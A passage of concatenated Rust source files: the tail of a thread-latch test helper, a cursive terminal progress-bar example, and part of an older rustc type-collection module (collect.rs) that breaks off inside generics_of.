count: usize,
) -> (Vec<LatchState>, Vec<usize>, Vec<LatchState>) {
let latch = Latch::new(count);
let cxl_ids = Arc::new(cxl_ids);
let res = (0..count)
.into_iter()
.map(|id| {
std::thread::spawn({
let l = Latch::clone(&latch);
let cxl_ids = Arc::clone(&cxl_ids);
move || {
if !cxl_ids.contains(&id) {
Ok(l.arrive_and_wait())
} else {
Err(l.cancel())
}
}
})
})
.collect::<Vec<_>>()
.into_iter()
.map(|h| h.join().unwrap());
let mut waits = Vec::new();
let mut cxls = Vec::new();
let mut cxl_attempts = Vec::new();
for r in res {
match r {
Ok(w) => waits.push(w),
Err(Ok(id)) => cxls.push(id),
Err(Err(s)) => cxl_attempts.push(s),
}
}
(waits, cxls, cxl_attempts)
}
}
progress.rs | use cursive::traits::*;
use cursive::utils::Counter;
use cursive::views::{Button, Dialog, LinearLayout, ProgressBar, TextView};
use cursive::Cursive;
use rand::Rng;
use std::cmp::min;
use std::thread;
use std::time::Duration;
// This example shows a ProgressBar reporting the status from an asynchronous
// job.
//
// It works by sharing a counter with the job thread. This counter can be
// "ticked" to indicate progress.
fn main() {
    let mut siv = Cursive::default();
    // We'll start slowly with a simple start button...
    siv.add_layer(
        Dialog::new()
            .title("Progress bar example")
            .padding_lrtb(0, 0, 1, 1)
            .content(Button::new("Start", phase_1)),
    );
    siv.run();
}
fn phase_1(s: &mut Cursive) {
// Phase 1 is easy: a simple pre-loading.
// Number of ticks
let n_max = 1000;
// This is the callback channel
let cb = s.cb_sink().clone();
s.pop_layer();
s.add_layer(Dialog::around(
ProgressBar::new()
// We need to know how many ticks represent a full bar.
.range(0, n_max)
.with_task(move |counter| {
// This closure will be called in a separate thread.
fake_load(n_max, &counter);
// When we're done, send a callback through the channel
cb.send(Box::new(coffee_break)).unwrap();
})
.full_width(),
));
s.set_autorefresh(true);
}
fn coffee_break(s: &mut Cursive) {
// A little break before things get serious.
s.set_autorefresh(false);
s.pop_layer();
s.add_layer(
Dialog::new()
.title("Preparation complete")
.content(TextView::new("Now, the real deal!").center())
.button("Again??", phase_2),
);
}
fn phase_2(s: &mut Cursive) {
// Now, we'll run N tasks
// (It could be downloading a file, extracting an archive,
// reticulating sprites, ...)
let n_bars = 10;
// Each task will have its own shiny counter
let counters: Vec<_> = (0..n_bars).map(|_| Counter::new(0)).collect();
// To make things more interesting, we'll give a random speed to each bar
let speeds: Vec<_> = (0..n_bars)
.map(|_| rand::thread_rng().gen_range(50, 150))
.collect();
let n_max = 100_000;
let cb = s.cb_sink().clone();
// Let's prepare the progress bars...
let mut linear = LinearLayout::vertical();
for c in &counters {
linear.add_child(ProgressBar::new().max(n_max).with_value(c.clone()));
}
s.pop_layer();
s.add_layer(Dialog::around(linear.full_width()).title("Just a moment..."));
// And we start the worker thread.
thread::spawn(move || {
loop {
thread::sleep(Duration::from_millis(5));
let mut done = true;
for (c, s) in counters.iter().zip(&speeds) {
let ticks = min(n_max - c.get(), *s);
c.tick(ticks);
if c.get() < n_max {
done = false;
}
}
if done {
break;
}
}
cb.send(Box::new(final_step)).unwrap();
});
s.set_autorefresh(true);
}
fn final_step(s: &mut Cursive) {
// A little break before things get serious.
s.set_autorefresh(false);
s.pop_layer();
s.add_layer(
Dialog::new()
.title("Report")
.content(
TextView::new(
"Time travel was a success!\n\
We went forward a few seconds!!",
)
.center(),
)
.button("That's it?", |s| s.quit()),
);
}
// Function to simulate a long process.
fn fake_load(n_max: usize, counter: &Counter) {
for _ in 0..n_max {
thread::sleep(Duration::from_millis(5));
// The `counter.tick()` method increases the progress value
counter.tick(1);
}
}
collect.rs | // Copyright 2012-2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! "Collection" is the process of determining the type and other external
//! details of each item in Rust. Collection is specifically concerned
//! with *interprocedural* things -- for example, for a function
//! definition, collection will figure out the type and signature of the
//! function, but it will not visit the *body* of the function in any way,
//! nor examine type annotations on local variables (that's the job of
//! type *checking*).
//!
//! Collecting is ultimately defined by a bundle of queries that
//! inquire after various facts about the items in the crate (e.g.,
//! `type_of`, `generics_of`, `predicates_of`, etc). See the `provide` function
//! for the full set.
//!
//! At present, however, we do run collection across all items in the
//! crate as a kind of pass. This should eventually be factored away.
use astconv::{AstConv, Bounds};
use constrained_type_params as ctp;
use lint;
use middle::lang_items::SizedTraitLangItem;
use middle::resolve_lifetime as rl;
use middle::weak_lang_items;
use rustc::mir::mono::Linkage;
use rustc::ty::query::Providers;
use rustc::ty::subst::Substs;
use rustc::ty::util::Discr;
use rustc::ty::util::IntTypeExt;
use rustc::ty::{self, AdtKind, ToPolyTraitRef, Ty, TyCtxt};
use rustc::ty::{ReprOptions, ToPredicate};
use rustc::util::captures::Captures;
use rustc::util::nodemap::FxHashMap;
use rustc_target::spec::abi;
use syntax::ast;
use syntax::ast::MetaItemKind;
use syntax::attr::{InlineAttr, list_contains_name, mark_used};
use syntax::source_map::Spanned;
use syntax::feature_gate;
use syntax::symbol::{keywords, Symbol};
use syntax_pos::{Span, DUMMY_SP};
use rustc::hir::def::{CtorKind, Def};
use rustc::hir::Node;
use rustc::hir::def_id::{DefId, LOCAL_CRATE};
use rustc::hir::intravisit::{self, NestedVisitorMap, Visitor};
use rustc::hir::GenericParamKind;
use rustc::hir::{self, CodegenFnAttrFlags, CodegenFnAttrs, Unsafety};
///////////////////////////////////////////////////////////////////////////
// Main entry point
pub fn collect_item_types<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>) {
let mut visitor = CollectItemTypesVisitor { tcx: tcx };
tcx.hir
.krate()
.visit_all_item_likes(&mut visitor.as_deep_visitor());
}
pub fn provide(providers: &mut Providers) {
*providers = Providers {
type_of,
generics_of,
predicates_of,
predicates_defined_on,
explicit_predicates_of,
super_predicates_of,
type_param_predicates,
trait_def,
adt_def,
fn_sig,
impl_trait_ref,
impl_polarity,
is_foreign_item,
codegen_fn_attrs,
..*providers
};
}
///////////////////////////////////////////////////////////////////////////
/// Context specific to some particular item. This is what implements
/// AstConv. It has information about the predicates that are defined
/// on the trait. Unfortunately, this predicate information is
/// available in various different forms at various points in the
/// process. So we can't just store a pointer to e.g. the AST or the
/// parsed ty form, we have to be more flexible. To this end, the
/// `ItemCtxt` is parameterized by a `DefId` that it uses to satisfy
/// `get_type_parameter_bounds` requests, drawing the information from
/// the AST (`hir::Generics`), recursively.
pub struct ItemCtxt<'a, 'tcx: 'a> {
tcx: TyCtxt<'a, 'tcx, 'tcx>,
item_def_id: DefId,
}
///////////////////////////////////////////////////////////////////////////
struct CollectItemTypesVisitor<'a, 'tcx: 'a> {
tcx: TyCtxt<'a, 'tcx, 'tcx>,
}
impl<'a, 'tcx> Visitor<'tcx> for CollectItemTypesVisitor<'a, 'tcx> {
    fn nested_visit_map<'this>(&'this mut self) -> NestedVisitorMap<'this, 'tcx> {
        NestedVisitorMap::OnlyBodies(&self.tcx.hir)
    }
fn visit_item(&mut self, item: &'tcx hir::Item) {
convert_item(self.tcx, item.id);
intravisit::walk_item(self, item);
}
fn visit_generics(&mut self, generics: &'tcx hir::Generics) {
for param in &generics.params {
match param.kind {
hir::GenericParamKind::Lifetime { .. } => {}
hir::GenericParamKind::Type {
default: Some(_), ..
} => {
let def_id = self.tcx.hir.local_def_id(param.id);
self.tcx.type_of(def_id);
}
hir::GenericParamKind::Type { .. } => {}
}
}
intravisit::walk_generics(self, generics);
}
fn visit_expr(&mut self, expr: &'tcx hir::Expr) {
if let hir::ExprKind::Closure(..) = expr.node {
let def_id = self.tcx.hir.local_def_id(expr.id);
self.tcx.generics_of(def_id);
self.tcx.type_of(def_id);
}
intravisit::walk_expr(self, expr);
}
fn visit_trait_item(&mut self, trait_item: &'tcx hir::TraitItem) {
convert_trait_item(self.tcx, trait_item.id);
intravisit::walk_trait_item(self, trait_item);
}
fn visit_impl_item(&mut self, impl_item: &'tcx hir::ImplItem) {
convert_impl_item(self.tcx, impl_item.id);
intravisit::walk_impl_item(self, impl_item);
}
}
///////////////////////////////////////////////////////////////////////////
// Utility types and common code for the above passes.
impl<'a, 'tcx> ItemCtxt<'a, 'tcx> {
pub fn new(tcx: TyCtxt<'a, 'tcx, 'tcx>, item_def_id: DefId) -> ItemCtxt<'a, 'tcx> {
ItemCtxt { tcx, item_def_id }
}
}
impl<'a, 'tcx> ItemCtxt<'a, 'tcx> {
pub fn to_ty(&self, ast_ty: &hir::Ty) -> Ty<'tcx> {
AstConv::ast_ty_to_ty(self, ast_ty)
}
}
impl<'a, 'tcx> AstConv<'tcx, 'tcx> for ItemCtxt<'a, 'tcx> {
fn tcx<'b>(&'b self) -> TyCtxt<'b, 'tcx, 'tcx> {
self.tcx
}
fn get_type_parameter_bounds(&self, span: Span, def_id: DefId) -> ty::GenericPredicates<'tcx> {
self.tcx
.at(span)
.type_param_predicates((self.item_def_id, def_id))
}
fn re_infer(
&self,
_span: Span,
_def: Option<&ty::GenericParamDef>,
) -> Option<ty::Region<'tcx>> {
None
}
fn ty_infer(&self, span: Span) -> Ty<'tcx> {
struct_span_err!(
self.tcx().sess,
span,
E0121,
"the type placeholder `_` is not allowed within types on item signatures"
).span_label(span, "not allowed in type signatures")
.emit();
self.tcx().types.err
}
fn projected_ty_from_poly_trait_ref(
&self,
span: Span,
item_def_id: DefId,
poly_trait_ref: ty::PolyTraitRef<'tcx>,
) -> Ty<'tcx> {
if let Some(trait_ref) = poly_trait_ref.no_late_bound_regions() {
self.tcx().mk_projection(item_def_id, trait_ref.substs)
} else {
// no late-bound regions, we can just ignore the binder
span_err!(
self.tcx().sess,
span,
E0212,
"cannot extract an associated type from a higher-ranked trait bound \
in this context"
);
self.tcx().types.err
}
}
fn normalize_ty(&self, _span: Span, ty: Ty<'tcx>) -> Ty<'tcx> {
// types in item signatures are not normalized, to avoid undue
// dependencies.
ty
}
fn set_tainted_by_errors(&self) {
// no obvious place to track this, just let it go
}
fn record_ty(&self, _hir_id: hir::HirId, _ty: Ty<'tcx>, _span: Span) {
// no place to record types from signatures?
}
}
fn type_param_predicates<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
(item_def_id, def_id): (DefId, DefId),
) -> ty::GenericPredicates<'tcx> {
use rustc::hir::*;
// In the AST, bounds can derive from two places. Either
// written inline like `<T:Foo>` or in a where clause like
// `where T:Foo`.
let param_id = tcx.hir.as_local_node_id(def_id).unwrap();
let param_owner = tcx.hir.ty_param_owner(param_id);
let param_owner_def_id = tcx.hir.local_def_id(param_owner);
let generics = tcx.generics_of(param_owner_def_id);
let index = generics.param_def_id_to_index[&def_id];
let ty = tcx.mk_ty_param(index, tcx.hir.ty_param_name(param_id).as_interned_str());
// Don't look for bounds where the type parameter isn't in scope.
let parent = if item_def_id == param_owner_def_id {
None
} else {
tcx.generics_of(item_def_id).parent
};
let mut result = parent.map_or(
ty::GenericPredicates {
parent: None,
predicates: vec![],
},
|parent| {
let icx = ItemCtxt::new(tcx, parent);
icx.get_type_parameter_bounds(DUMMY_SP, def_id)
},
);
let item_node_id = tcx.hir.as_local_node_id(item_def_id).unwrap();
let ast_generics = match tcx.hir.get(item_node_id) {
Node::TraitItem(item) => &item.generics,
Node::ImplItem(item) => &item.generics,
Node::Item(item) => {
match item.node {
ItemKind::Fn(.., ref generics, _)
| ItemKind::Impl(_, _, _, ref generics, ..)
| ItemKind::Ty(_, ref generics)
| ItemKind::Existential(ExistTy {
ref generics,
impl_trait_fn: None,
..
})
| ItemKind::Enum(_, ref generics)
| ItemKind::Struct(_, ref generics)
| ItemKind::Union(_, ref generics) => generics,
ItemKind::Trait(_, _, ref generics, ..) => {
// Implied `Self: Trait` and supertrait bounds.
if param_id == item_node_id {
result
.predicates
.push(ty::TraitRef::identity(tcx, item_def_id).to_predicate());
}
generics
}
_ => return result,
}
}
Node::ForeignItem(item) => match item.node {
ForeignItemKind::Fn(_, _, ref generics) => generics,
_ => return result,
},
_ => return result,
};
let icx = ItemCtxt::new(tcx, item_def_id);
result
.predicates
.extend(icx.type_parameter_bounds_in_generics(ast_generics, param_id, ty));
result
}
impl<'a, 'tcx> ItemCtxt<'a, 'tcx> {
/// Find bounds from hir::Generics. This requires scanning through the
/// AST. We do this to avoid having to convert *all* the bounds, which
/// would create artificial cycles. Instead we can only convert the
/// bounds for a type parameter `X` if `X::Foo` is used.
fn type_parameter_bounds_in_generics(
&self,
ast_generics: &hir::Generics,
param_id: ast::NodeId,
ty: Ty<'tcx>,
) -> Vec<ty::Predicate<'tcx>> {
let from_ty_params = ast_generics
.params
.iter()
.filter_map(|param| match param.kind {
GenericParamKind::Type { .. } if param.id == param_id => Some(¶m.bounds),
_ => None,
})
.flat_map(|bounds| bounds.iter())
.flat_map(|b| predicates_from_bound(self, ty, b));
let from_where_clauses = ast_generics
.where_clause
.predicates
.iter()
.filter_map(|wp| match *wp {
hir::WherePredicate::BoundPredicate(ref bp) => Some(bp),
_ => None,
})
.filter(|bp| is_param(self.tcx, &bp.bounded_ty, param_id))
.flat_map(|bp| bp.bounds.iter())
.flat_map(|b| predicates_from_bound(self, ty, b));
from_ty_params.chain(from_where_clauses).collect()
}
}
/// Tests whether this is the AST for a reference to the type
/// parameter with id `param_id`. We use this so as to avoid running
/// `ast_ty_to_ty`, because we want to avoid triggering an all-out
/// conversion of the type to avoid inducing unnecessary cycles.
fn is_param<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
ast_ty: &hir::Ty,
param_id: ast::NodeId,
) -> bool {
if let hir::TyKind::Path(hir::QPath::Resolved(None, ref path)) = ast_ty.node {
match path.def {
Def::SelfTy(Some(def_id), None) | Def::TyParam(def_id) => {
def_id == tcx.hir.local_def_id(param_id)
}
_ => false,
}
} else {
false
}
}
fn convert_item<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, item_id: ast::NodeId) {
let it = tcx.hir.expect_item(item_id);
debug!("convert: item {} with id {}", it.name, it.id);
let def_id = tcx.hir.local_def_id(item_id);
match it.node {
// These don't define types.
hir::ItemKind::ExternCrate(_)
| hir::ItemKind::Use(..)
| hir::ItemKind::Mod(_)
| hir::ItemKind::GlobalAsm(_) => {}
hir::ItemKind::ForeignMod(ref foreign_mod) => {
for item in &foreign_mod.items {
let def_id = tcx.hir.local_def_id(item.id);
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.predicates_of(def_id);
if let hir::ForeignItemKind::Fn(..) = item.node {
tcx.fn_sig(def_id);
}
}
}
hir::ItemKind::Enum(ref enum_definition, _) => {
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.predicates_of(def_id);
convert_enum_variant_types(tcx, def_id, &enum_definition.variants);
}
hir::ItemKind::Impl(..) => {
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.impl_trait_ref(def_id);
tcx.predicates_of(def_id);
}
hir::ItemKind::Trait(..) => {
tcx.generics_of(def_id);
tcx.trait_def(def_id);
tcx.at(it.span).super_predicates_of(def_id);
tcx.predicates_of(def_id);
}
hir::ItemKind::TraitAlias(..) => {
span_err!(
tcx.sess,
it.span,
E0645,
"trait aliases are not yet implemented (see issue #41517)"
);
}
hir::ItemKind::Struct(ref struct_def, _) | hir::ItemKind::Union(ref struct_def, _) => {
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.predicates_of(def_id);
for f in struct_def.fields() {
let def_id = tcx.hir.local_def_id(f.id);
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.predicates_of(def_id);
}
if !struct_def.is_struct() {
convert_variant_ctor(tcx, struct_def.id());
}
}
// Desugared from `impl Trait` -> visited by the function's return type
hir::ItemKind::Existential(hir::ExistTy {
impl_trait_fn: Some(_),
..
}) => {}
hir::ItemKind::Existential(..)
| hir::ItemKind::Ty(..)
| hir::ItemKind::Static(..)
| hir::ItemKind::Const(..)
| hir::ItemKind::Fn(..) => {
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.predicates_of(def_id);
if let hir::ItemKind::Fn(..) = it.node {
tcx.fn_sig(def_id);
}
}
}
}
fn convert_trait_item<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, trait_item_id: ast::NodeId) {
let trait_item = tcx.hir.expect_trait_item(trait_item_id);
let def_id = tcx.hir.local_def_id(trait_item.id);
tcx.generics_of(def_id);
match trait_item.node {
hir::TraitItemKind::Const(..)
| hir::TraitItemKind::Type(_, Some(_))
| hir::TraitItemKind::Method(..) => {
tcx.type_of(def_id);
if let hir::TraitItemKind::Method(..) = trait_item.node {
tcx.fn_sig(def_id);
}
}
hir::TraitItemKind::Type(_, None) => {}
};
tcx.predicates_of(def_id);
}
fn convert_impl_item<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, impl_item_id: ast::NodeId) {
let def_id = tcx.hir.local_def_id(impl_item_id);
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.predicates_of(def_id);
if let hir::ImplItemKind::Method(..) = tcx.hir.expect_impl_item(impl_item_id).node {
tcx.fn_sig(def_id);
}
}
fn convert_variant_ctor<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, ctor_id: ast::NodeId) {
let def_id = tcx.hir.local_def_id(ctor_id);
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.predicates_of(def_id);
}
fn convert_enum_variant_types<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
def_id: DefId,
variants: &[hir::Variant],
) {
let def = tcx.adt_def(def_id);
let repr_type = def.repr.discr_type();
let initial = repr_type.initial_discriminant(tcx);
let mut prev_discr = None::<Discr<'tcx>>;
// fill the discriminant values and field types
for variant in variants {
let wrapped_discr = prev_discr.map_or(initial, |d| d.wrap_incr(tcx));
prev_discr = Some(
if let Some(ref e) = variant.node.disr_expr {
let expr_did = tcx.hir.local_def_id(e.id);
def.eval_explicit_discr(tcx, expr_did)
} else if let Some(discr) = repr_type.disr_incr(tcx, prev_discr) {
Some(discr)
} else {
struct_span_err!(
tcx.sess,
variant.span,
E0370,
"enum discriminant overflowed"
).span_label(
variant.span,
format!("overflowed on value after {}", prev_discr.unwrap()),
)
.note(&format!(
"explicitly set `{} = {}` if that is desired outcome",
variant.node.name, wrapped_discr
))
.emit();
None
}.unwrap_or(wrapped_discr),
);
for f in variant.node.data.fields() {
let def_id = tcx.hir.local_def_id(f.id);
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.predicates_of(def_id);
}
// Convert the ctor, if any. This also registers the variant as
// an item.
convert_variant_ctor(tcx, variant.node.data.id());
}
}
fn convert_variant<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
did: DefId,
name: ast::Name,
discr: ty::VariantDiscr,
def: &hir::VariantData,
adt_kind: ty::AdtKind
) -> ty::VariantDef {
let mut seen_fields: FxHashMap<ast::Ident, Span> = FxHashMap();
let node_id = tcx.hir.as_local_node_id(did).unwrap();
let fields = def
.fields()
.iter()
.map(|f| {
let fid = tcx.hir.local_def_id(f.id);
let dup_span = seen_fields.get(&f.ident.modern()).cloned();
if let Some(prev_span) = dup_span {
struct_span_err!(
tcx.sess,
f.span,
E0124,
"field `{}` is already declared",
f.ident
).span_label(f.span, "field already declared")
.span_label(prev_span, format!("`{}` first declared here", f.ident))
.emit();
} else {
seen_fields.insert(f.ident.modern(), f.span);
}
ty::FieldDef {
did: fid,
ident: f.ident,
vis: ty::Visibility::from_hir(&f.vis, node_id, tcx),
}
})
.collect();
ty::VariantDef::new(tcx,
did,
name,
discr,
fields,
adt_kind,
CtorKind::from_hir(def))
}
fn adt_def<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, def_id: DefId) -> &'tcx ty::AdtDef {
use rustc::hir::*;
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
let item = match tcx.hir.get(node_id) {
Node::Item(item) => item,
_ => bug!(),
};
let repr = ReprOptions::new(tcx, def_id);
let (kind, variants) = match item.node {
ItemKind::Enum(ref def, _) => {
let mut distance_from_explicit = 0;
(
AdtKind::Enum,
def.variants
.iter()
.map(|v| {
let did = tcx.hir.local_def_id(v.node.data.id());
let discr = if let Some(ref e) = v.node.disr_expr {
distance_from_explicit = 0;
ty::VariantDiscr::Explicit(tcx.hir.local_def_id(e.id))
} else {
ty::VariantDiscr::Relative(distance_from_explicit)
};
distance_from_explicit += 1;
convert_variant(tcx, did, v.node.name, discr, &v.node.data, AdtKind::Enum)
})
.collect(),
)
}
ItemKind::Struct(ref def, _) => {
// Use separate constructor id for unit/tuple structs and reuse did for braced structs.
let ctor_id = if !def.is_struct() {
Some(tcx.hir.local_def_id(def.id()))
} else {
None
};
(
AdtKind::Struct,
vec![convert_variant(
tcx,
ctor_id.unwrap_or(def_id),
item.name,
ty::VariantDiscr::Relative(0),
def,
AdtKind::Struct
)],
)
}
ItemKind::Union(ref def, _) => (
AdtKind::Union,
vec![convert_variant(
tcx,
def_id,
item.name,
ty::VariantDiscr::Relative(0),
def,
AdtKind::Union
)],
),
_ => bug!(),
};
tcx.alloc_adt_def(def_id, kind, variants, repr)
}
/// Ensures that the super-predicates of the trait with def-id
/// trait_def_id are converted and stored. This also ensures that
/// the transitive super-predicates are converted;
fn super_predicates_of<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
trait_def_id: DefId,
) -> ty::GenericPredicates<'tcx> {
debug!("super_predicates(trait_def_id={:?})", trait_def_id);
let trait_node_id = tcx.hir.as_local_node_id(trait_def_id).unwrap();
let item = match tcx.hir.get(trait_node_id) {
Node::Item(item) => item,
_ => bug!("trait_node_id {} is not an item", trait_node_id),
};
let (generics, bounds) = match item.node {
hir::ItemKind::Trait(.., ref generics, ref supertraits, _) => (generics, supertraits),
hir::ItemKind::TraitAlias(ref generics, ref supertraits) => (generics, supertraits),
_ => span_bug!(item.span, "super_predicates invoked on non-trait"),
};
let icx = ItemCtxt::new(tcx, trait_def_id);
// Convert the bounds that follow the colon, e.g. `Bar+Zed` in `trait Foo : Bar+Zed`.
let self_param_ty = tcx.mk_self_type();
let superbounds1 = compute_bounds(&icx, self_param_ty, bounds, SizedByDefault::No, item.span);
let superbounds1 = superbounds1.predicates(tcx, self_param_ty);
// Convert any explicit superbounds in the where clause,
// e.g. `trait Foo where Self : Bar`:
let superbounds2 = icx.type_parameter_bounds_in_generics(generics, item.id, self_param_ty);
// Combine the two lists to form the complete set of superbounds:
let superbounds: Vec<_> = superbounds1.into_iter().chain(superbounds2).collect();
// Now require that immediate supertraits are converted,
// which will, in turn, reach indirect supertraits.
for bound in superbounds.iter().filter_map(|p| p.to_opt_poly_trait_ref()) {
tcx.at(item.span).super_predicates_of(bound.def_id());
}
ty::GenericPredicates {
parent: None,
predicates: superbounds,
}
}
fn trait_def<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, def_id: DefId) -> &'tcx ty::TraitDef {
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
let item = tcx.hir.expect_item(node_id);
let (is_auto, unsafety) = match item.node {
hir::ItemKind::Trait(is_auto, unsafety, ..) => (is_auto == hir::IsAuto::Yes, unsafety),
hir::ItemKind::TraitAlias(..) => (false, hir::Unsafety::Normal),
_ => span_bug!(item.span, "trait_def_of_item invoked on non-trait"),
};
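// `#[rustc_paren_sugar]` marks traits that may be written with
// parenthesized arguments, e.g. `Fn(u32) -> bool` (illustrative);
// its use is gated on `unboxed_closures` below.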
let paren_sugar = tcx.has_attr(def_id, "rustc_paren_sugar");
if paren_sugar && !tcx.features().unboxed_closures {
let mut err = tcx.sess.struct_span_err(
item.span,
"the `#[rustc_paren_sugar]` attribute is a temporary means of controlling \
which traits can use parenthetical notation",
);
help!(
&mut err,
"add `#![feature(unboxed_closures)]` to \
the crate attributes to use it"
);
err.emit();
}
let def_path_hash = tcx.def_path_hash(def_id);
let def = ty::TraitDef::new(def_id, unsafety, paren_sugar, is_auto, def_path_hash);
tcx.alloc_trait_def(def)
}
fn has_late_bound_regions<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
node: Node<'tcx>,
) -> Option<Span> {
struct LateBoundRegionsDetector<'a, 'tcx: 'a> {
tcx: TyCtxt<'a, 'tcx, 'tcx>,
outer_index: ty::DebruijnIndex,
has_late_bound_regions: Option<Span>,
}
impl<'a, 'tcx> Visitor<'tcx> for LateBoundRegionsDetector<'a, 'tcx> {
fn nested_visit_map<'this>(&'this mut self) -> NestedVisitorMap<'this, 'tcx> {
NestedVisitorMap::None
}
fn visit_ty(&mut self, ty: &'tcx hir::Ty) {
if self.has_late_bound_regions.is_some() {
return;
}
match ty.node {
hir::TyKind::BareFn(..) => {
self.outer_index.shift_in(1);
intravisit::walk_ty(self, ty);
self.outer_index.shift_out(1);
}
_ => intravisit::walk_ty(self, ty),
}
}
fn visit_poly_trait_ref(
&mut self,
tr: &'tcx hir::PolyTraitRef,
m: hir::TraitBoundModifier,
) {
if self.has_late_bound_regions.is_some() {
return;
}
self.outer_index.shift_in(1);
intravisit::walk_poly_trait_ref(self, tr, m);
self.outer_index.shift_out(1);
}
fn visit_lifetime(&mut self, lt: &'tcx hir::Lifetime) {
if self.has_late_bound_regions.is_some() {
return;
}
let hir_id = self.tcx.hir.node_to_hir_id(lt.id);
match self.tcx.named_region(hir_id) {
Some(rl::Region::Static) | Some(rl::Region::EarlyBound(..)) => {}
Some(rl::Region::LateBound(debruijn, _, _))
| Some(rl::Region::LateBoundAnon(debruijn, _)) if debruijn < self.outer_index => {}
Some(rl::Region::LateBound(..))
| Some(rl::Region::LateBoundAnon(..))
| Some(rl::Region::Free(..))
| None => {
self.has_late_bound_regions = Some(lt.span);
}
}
}
}
fn has_late_bound_regions<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
generics: &'tcx hir::Generics,
decl: &'tcx hir::FnDecl,
) -> Option<Span> {
let mut visitor = LateBoundRegionsDetector {
tcx,
outer_index: ty::INNERMOST,
has_late_bound_regions: None,
};
for param in &generics.params {
match param.kind {
GenericParamKind::Lifetime { .. } => {
let hir_id = tcx.hir.node_to_hir_id(param.id);
if tcx.is_late_bound(hir_id) {
return Some(param.span);
}
}
_ => {}
}
}
visitor.visit_fn_decl(decl);
visitor.has_late_bound_regions
}
match node {
Node::TraitItem(item) => match item.node {
hir::TraitItemKind::Method(ref sig, _) => {
has_late_bound_regions(tcx, &item.generics, &sig.decl)
}
_ => None,
},
Node::ImplItem(item) => match item.node {
hir::ImplItemKind::Method(ref sig, _) => {
has_late_bound_regions(tcx, &item.generics, &sig.decl)
}
_ => None,
},
Node::ForeignItem(item) => match item.node {
hir::ForeignItemKind::Fn(ref fn_decl, _, ref generics) => {
has_late_bound_regions(tcx, generics, fn_decl)
}
_ => None,
},
Node::Item(item) => match item.node {
hir::ItemKind::Fn(ref fn_decl, .., ref generics, _) => {
has_late_bound_regions(tcx, generics, fn_decl)
}
_ => None,
},
_ => None,
}
}
fn generics_of<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, def_id: DefId) -> &'tcx ty::Generics {
use rustc::hir::*;
let node_id = tcx.hir.as_local_node_id(def_id).unwrap();
let node = tcx.hir.get(node_id);
let parent_def_id = match node {
Node::ImplItem(_) | Node::TraitItem(_) | Node::Variant(_)
| Node::StructCtor(_) | Node::Field(_) => {
let parent_id = tcx.hir.get_parent(node_id);
Some(tcx.hir.local_def_id(parent_id))
}
Node::Expr(&hir::Expr {
node: hir::ExprKind::Closure(..),
..
}) => Some(tcx.closure_base_def_id(def_id)),
Node::Item(item) => match item.node {
ItemKind::Existential(hir::ExistTy { impl_trait_fn, .. }) => impl_trait_fn,
_ => None,
},
_ => None,
};
let mut opt_self = None;
let mut allow_defaults = false;
let no_generics = hir::Generics::empty();
let ast_generics = match node {
Node::TraitItem(item) => &item.generics,
Node::ImplItem(item) => &item.generics,
Node::Item(item) => {
match item.node {
ItemKind::Fn(.., ref generics, _) | ItemKind::Impl(_, _, _, ref generics, ..) => {
generics
}
ItemKind::Ty(_, ref generics)
| ItemKind::Enum(_, ref generics)
| ItemKind::Struct(_, ref generics)
| ItemKind::Existential(hir::ExistTy { ref generics, .. })
| ItemKind::Union(_, ref generics) => {
allow_defaults = true;
generics
}
ItemKind::Trait(_, _, ref generics, ..)
| ItemKind::TraitAlias(ref generics, ..) => {
// Add in the self type parameter.
//
// Something of a hack: use the node id for the trait, also as
// the node id for the Self type parameter.
let param_id = item.id;
opt_self = Some(ty::GenericParamDef {
index: 0,
name: keywords::SelfType.name().as_interned_str(),
def_id: tcx.hir.local_def_id(param_id),
pure_wrt_drop: false,
kind: ty::GenericParamDefKind::Type {
has_default: false,
object_lifetime_default: rl::Set1::Empty,
synthetic: None,
},
});
allow_defaults = true;
generics
}
_ => &no_generics,
}
}
Node::ForeignItem(item) => match item.node {
ForeignItemKind::Static(..) => &no_generics,
ForeignItemKind::Fn(_, _, ref generics) => generics,
ForeignItemKind::Type => &no_generics,
},
_ => &no_generics,
};
let has_self = opt_self.is_some();
let mut parent_has_self = false;
let mut own_start = has_self as u32;
let parent_count = parent_def_id.map_or(0, |def_id| {
let generics = tcx.generics_of(def_id);
assert_eq!(has_self, false);
parent_has_self = generics.has_self;
own_start = generics.count() as u32;
generics.parent_count + generics.params.len()
});
let mut params: Vec<_> = opt_self.into_iter().collect();
let early_lifetimes = early_bound_lifetimes_from_generics(tcx, ast_generics);
params.extend(
early_lifetimes
.enumerate()
.map(|(i, param)| ty::GenericParamDef {
